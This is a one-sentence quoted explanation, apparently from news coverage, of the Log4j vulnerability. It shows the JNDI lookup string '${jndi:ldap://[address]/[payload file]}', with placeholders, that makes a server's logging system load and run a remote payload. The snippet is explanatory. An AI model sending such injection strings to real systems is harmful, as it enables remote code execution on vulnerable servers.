Log4j: “all the attacker has to do is send a request along the lines of ${jndi:ldap://[address]/[payload file]} for the payload file to be executed in the context of the server’s Log4j logging system.”